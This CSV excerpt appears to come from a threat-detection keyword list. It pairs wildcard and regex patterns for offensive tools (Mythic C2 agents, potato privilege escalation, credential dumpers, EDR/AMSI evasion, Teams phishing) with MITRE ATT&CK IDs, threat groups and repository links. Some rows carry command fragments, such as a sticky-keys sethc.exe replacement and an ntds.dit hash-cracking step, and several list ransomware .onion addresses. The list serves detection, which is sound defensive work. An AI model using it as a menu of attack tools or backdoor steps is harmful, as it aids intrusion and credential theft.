"*MultiPotato.cpp*",".{0,1000}MultiPotato\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52513"
"*MultiPotato.exe*",".{0,1000}MultiPotato\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52514"
"*MultiPotato-main*",".{0,1000}MultiPotato\-main.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52515"
"*mustafashykh/router-scan*",".{0,1000}mustafashykh\/router\-scan.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","52516"
"*--mutator N*",".{0,1000}\-\-mutator\sN.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","52517"
"*mutator.py *",".{0,1000}mutator\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","52518"
"*mv ""/media/windows/Windows/System32/sethc.exe"" ""/media/windows/Windows/System32/*",".{0,1000}mv\s\""\/media\/windows\/Windows\/System32\/sethc\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","52519"
"*mv *.ccache *.ccache*",".{0,1000}mv\s.{0,1000}\.ccache\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","52520"
"*mvelazc0/BadZure*",".{0,1000}mvelazc0\/BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","52522"
"*-my.sharepoint.com/personal/Fakeuser*",".{0,1000}\-my\.sharepoint\.com\/personal\/Fakeuser.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","52523"
"*-my.sharepoint.com/personal/TESTUSER_*",".{0,1000}\-my\.sharepoint\.com\/personal\/TESTUSER_.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","52524"
"*my_dump_my_pe*",".{0,1000}my_dump_my_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","52525"
"*MY_MESSAGE ""I did it for the vine.""*",".{0,1000}MY_MESSAGE\s\""I\sdid\sit\sfor\sthe\svine\.\"".{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","52526"
"*mybmtbgd7aprdnw2ekxht5qap5daam2wch25coqerrq2zdioanob34ad.onion*",".{0,1000}mybmtbgd7aprdnw2ekxht5qap5daam2wch25coqerrq2zdioanob34ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52527"
"*MyMeterpreter.ps1*",".{0,1000}MyMeterpreter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52528"
"*myosbja7hixkkjqihsjh6yvmqplz62gr3r4isctjjtu2vm5jg6hsv2ad.onion*",".{0,1000}myosbja7hixkkjqihsjh6yvmqplz62gr3r4isctjjtu2vm5jg6hsv2ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52529"
"*myreallycooltotallyrealtenant.onmicrosoft.com*",".{0,1000}myreallycooltotallyrealtenant\.onmicrosoft\.com.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","52530"
"*myseatbelt.py*",".{0,1000}myseatbelt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","52531"
"*mysql -u* -p c2 < c2_sample.sql*",".{0,1000}mysql\s\-u.{0,1000}\s\-p\sc2\s\<\sc2_sample\.sql.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","52532"
"*mysql_authbypass_hashdump.rb*",".{0,1000}mysql_authbypass_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52533"
"*mysql_file_enum.rb*",".{0,1000}mysql_file_enum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52534"
"*mysql_hashdump.rb*",".{0,1000}mysql_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52535"
"*mysql-privesc-race.c*",".{0,1000}mysql\-privesc\-race\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","52536"
"*Mystikal-main*",".{0,1000}Mystikal\-main.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","52537"
"*mythic_c2_container*",".{0,1000}mythic_c2_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52538"
"*mythic_nginx*",".{0,1000}mythic_nginx.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52539"
"*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52540"
"*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52541"
"*mythic_payloadtype_container*",".{0,1000}mythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52542"
"*mythic_rest.Payload*",".{0,1000}mythic_rest\.Payload.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52543"
"*mythic_service.py*",".{0,1000}mythic_service\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52544"
"*mythic_translator_containter*",".{0,1000}mythic_translator_containter.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52545"
"*MythicAgents/Apollo*",".{0,1000}MythicAgents\/Apollo.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52546"
"*MythicAgents/Athena*",".{0,1000}MythicAgents\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52547"
"*MythicAgents/merlin*",".{0,1000}MythicAgents\/merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","52548"
"*MythicAgents/tetanus*",".{0,1000}MythicAgents\/tetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","52549"
"*MythicAgents/thanatos*",".{0,1000}MythicAgents\/thanatos.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","52550"
"*mythic-cli *",".{0,1000}mythic\-cli\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52551"
"*mythic-cli*athena*",".{0,1000}mythic\-cli.{0,1000}athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52552"
"*MythicClient.cs*",".{0,1000}MythicClient\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52553"
"*mythic-docker*",".{0,1000}mythic\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52554"
"*myz.xcg@gmail.com*",".{0,1000}myz\.xcg\@gmail\.com.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#email","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","52555"
"*myzxcg/RealBlindingEDR*",".{0,1000}myzxcg\/RealBlindingEDR.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","52556"
"*MzHmO/DebugAmsi*",".{0,1000}MzHmO\/DebugAmsi.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","52558"
"*MzHmO/NtlmThief*",".{0,1000}MzHmO\/NtlmThief.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","52559"
"*MzHmO/Parasite-Invoke*",".{0,1000}MzHmO\/Parasite\-Invoke.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","52560"
"*MzHmO/PowershellKerberos*",".{0,1000}MzHmO\/PowershellKerberos.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","52561"
"*MzHmO/Privileger*",".{0,1000}MzHmO\/Privileger.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","52562"
"*MzHmO/TGSThief*",".{0,1000}MzHmO\/TGSThief.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","52563"
"*-n ntds.dit -c hashcat*",".{0,1000}\-n\sntds\.dit\s\-c\shashcat.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","52564"
"*n00py/LAPSDumper*",".{0,1000}n00py\/LAPSDumper.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","52565"
"*n00py/Slackor*",".{0,1000}n00py\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","52566"
"*n0de.exe*elevationstation*",".{0,1000}n0de\.exe.{0,1000}elevationstation.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","52567"
"*n1k7l4i/goMatrixC2*",".{0,1000}n1k7l4i\/goMatrixC2.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","52568"
"*n1k7l4i/goZulipC2*",".{0,1000}n1k7l4i\/goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","52569"
"*n1nj4sec/mimipy*",".{0,1000}n1nj4sec\/mimipy.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","52570"
"*n37sn4k3/BrowserDataGrabber*",".{0,1000}n37sn4k3\/BrowserDataGrabber.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","52571"
